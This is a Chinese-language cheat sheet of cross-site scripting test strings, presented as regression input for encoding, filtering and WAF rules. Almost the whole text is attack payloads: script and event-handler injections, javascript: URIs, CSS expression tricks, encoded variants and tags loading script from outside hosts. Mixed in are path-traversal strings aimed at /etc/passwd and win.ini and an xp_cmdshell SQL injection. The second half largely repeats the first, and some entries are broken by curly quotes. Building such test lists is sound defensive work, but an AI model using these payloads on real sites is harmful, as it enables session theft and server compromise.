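XSS 测试

以下为 XSS 测试字符串列表，可作为输出编码、输入过滤或 WAF 规则的回归测试输入。列表中还混有少量非 XSS 的条目（路径遍历和 SQL 注入字符串），后半部分基本重复前半部分的条目；另有部分条目的引号在排版时被替换成了弯引号，与原始的 ASCII 形式不一致。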

IMG_3081

<svg onload=alert(1)></svg>

<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')"></img>

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

a.jsp/<script>alert('Vulnerable')</script>

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

<IMG src="javascript:alert('XSS');"></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src=JaVaScRiPt:alert('XSS')></IMG>

<IMG src=JaVaScRiPt:alert("XSS")></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src="jav ascript:alert('XSS');"></IMG>

<IMG src="jav ascript:alert('XSS');"></IMG>

<IMG src="jav ascript:alert('XSS');"></IMG>

"<IMG src=java\0script:alert(\"XSS\")>";' > out

<IMG src=" javascript:alert('XSS');"></IMG>

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')"></BODY>

<BODY ONLOAD=alert('XSS')></BODY>

<IMG DYNSRC="javascript:alert('XSS')"></IMG>

<IMG LOWSRC="javascript:alert('XSS')"></IMG>

<BGSOUND src="javascript:alert('XSS');"></BGSOUND>

<br size="&{alert('XSS')}">

<LAYER src="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet" href="javascript:alert('XSS');">

<IMG src='vbscript:msgbox("XSS")'>

<IMG src="mocha:[code]">

<IMG src="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME src=javascript:alert('XSS')></IFRAME>

<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE href="javascript:alert('XSS');//">

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

<XML src="javascript:alert('XSS');">

"> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>

<IMG src="javascript:alert('XSS')"

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->

<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>

<IMG SRC=javascript:alert(‘XSS’)>

<IMG SRC=# onmouseover=”alert(‘xxs’)”>

<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>

<img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>

<IMG SRC=” &#14; javascript:alert(‘XSS’);”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

<IMG SRC=”javascript:alert(‘XSS’)”

</script><script>alert(‘XSS’);</script>

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

<svg/onload=alert('XSS')>

<IMG SRC=’vbscript:msgbox(“XSS”)’>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="behavior: url(xss.htc);">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="width: expression(alert('XSS'));">

<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

<script>alert(/xss/)</script>

<svg onload=alert(document.domain)>

<img src=document.domain onerror=alert(document.domain)>

<M onmouseover=alert(document.domain)>M

<marquee onscroll=alert(document.domain)>

<a href=javascript:alert(document.domain)>M</a>

<body onload=alert(document.domain)>

<details open ontoggle=alert(document.domain)>

<embed src=javascript:alert(document.domain)>

<script>alert(1)</script>

<sCrIpT>alert(1)</sCrIpT>

<ScRiPt>alert(1)</ScRiPt>

<sCrIpT>alert(1)</ScRiPt>

<ScRiPt>alert(1)</sCrIpT>

<img src=1 onerror=alert(1)>

<iMg src=1 oNeRrOr=alert(1)>

<ImG src=1 OnErRoR=alert(1)>

<img src=1 onerror="alert(&quot;M&quot;)">

<marquee onscroll=alert(1)>

<mArQuEe OnScRoLl=alert(1)>

<MaRqUeE oNsCrOlL=alert(1)>

<a href=javascript:/0/,alert(%22M%22)>M</a>

<a href=javascript:/00/,alert(%22M%22)>M</a>

<a href=javascript:/000/,alert(%22M%22)>M</a>

<a href=javascript:/M/,alert(%22M%22)>M</a>

<base href=javascript:/M/><a href=,alert(1)>M</a>

<base href=javascript:/M/><iframe src=,alert(1)></iframe>

</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>

"><img src=x onerror=alert(document.cookie)>.gif

<div style="background-image:url(javascript:alert(/xss/))">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<iframe src=javascript:alert(1)></iframe>

<iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>

<iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>

<iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>

<iframe src=https://baidu.com width=1366 height=768></iframe>

<iframe src=javascript:alert(1) width=1366 height=768></iframe

<form action=javascript:alert(1)><input type=submit>

<form><button formaction=javascript:alert(1)>M

<form><input formaction=javascript:alert(1) type=submit value=M>

<form><input formaction=javascript:alert(1) type=image value=M>

<form><input formaction=javascript:alert(1) type=image src=1>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<ScRiPt >prompt(915149)</ScRiPt>

<svg/onload=alert(1)>

<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

a.jsp/<script>alert('Vulnerable')</script>

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

<IMG src="javascript:alert('XSS');">

<IMG src=javascript:alert('XSS')>

<IMG src=JaVaScRiPt:alert('XSS')>

<IMG src=JaVaScRiPt:alert("XSS")>

<IMG src=javascript:alert('XSS')>

<IMG src=javascript:alert('XSS')>

<IMG src=javascript:alert('XSS')>

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

"<IMG src=java\0script:alert(\"XSS\")>";' > out

<IMG src=" javascript:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND src="javascript:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER src="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet" href="javascript:alert('XSS');">

<IMG src='vbscript:msgbox("XSS")'>

<IMG src="mocha:[code]">

<IMG src="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME src=javascript:alert('XSS')></IFRAME>

<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE href="javascript:alert('XSS');//">

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

<XML src="javascript:alert('XSS');">

"> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>

<IMG src="javascript:alert('XSS')"

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->

<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>

<IMG SRC=javascript:alert(‘XSS’)>

<IMG SRC=# onmouseover=”alert(‘xxs’)”>

<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>

<img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>

<IMG SRC=” &#14; javascript:alert(‘XSS’);”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

<IMG SRC=”javascript:alert(‘XSS’)”

</script><script>alert(‘XSS’);</script>

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

<svg/onload=alert('XSS')>

<IMG SRC=’vbscript:msgbox(“XSS”)’>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="behavior: url(xss.htc);">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="width: expression(alert('XSS'));">

<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

<script>alert(/xss/)</script>

<svg onload=alert(document.domain)>

<img src=document.domain onerror=alert(document.domain)>

<M onmouseover=alert(document.domain)>M

<marquee onscroll=alert(document.domain)>

<a href=javascript:alert(document.domain)>M</a>

<body onload=alert(document.domain)>

<details open ontoggle=alert(document.domain)>

<embed src=javascript:alert(document.domain)>

<script>alert(1)</script>

<sCrIpT>alert(1)</sCrIpT>

<ScRiPt>alert(1)</ScRiPt>

<sCrIpT>alert(1)</ScRiPt>

<ScRiPt>alert(1)</sCrIpT>

<img src=1 onerror=alert(1)>

<iMg src=1 oNeRrOr=alert(1)>

<ImG src=1 OnErRoR=alert(1)>

<img src=1 onerror="alert(&quot;M&quot;)">

<marquee onscroll=alert(1)>

<mArQuEe OnScRoLl=alert(1)>

<MaRqUeE oNsCrOlL=alert(1)>

<a href=javascript:/0/,alert(%22M%22)>M</a>

<a href=javascript:/00/,alert(%22M%22)>M</a>

<a href=javascript:/000/,alert(%22M%22)>M</a>

<a href=javascript:/M/,alert(%22M%22)>M</a>

<base href=javascript:/M/><a href=,alert(1)>M</a>

<base href=javascript:/M/><iframe src=,alert(1)></iframe>

</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>

"><img src=x onerror=alert(document.cookie)>.gif

<div style="background-image:url(javascript:alert(/xss/))">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<iframe src=javascript:alert(1)></iframe>

<iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>

<iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>

<iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>

<iframe src=https://baidu.com width=1366 height=768></iframe>

<iframe src=javascript:alert(1) width=1366 height=768></iframe

<form action=javascript:alert(1)><input type=submit>

<form><button formaction=javascript:alert(1)>M

<form><input formaction=javascript:alert(1) type=submit value=M>

<form><input formaction=javascript:alert(1) type=image value=M>

<form><input formaction=javascript:alert(1) type=image src=1>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
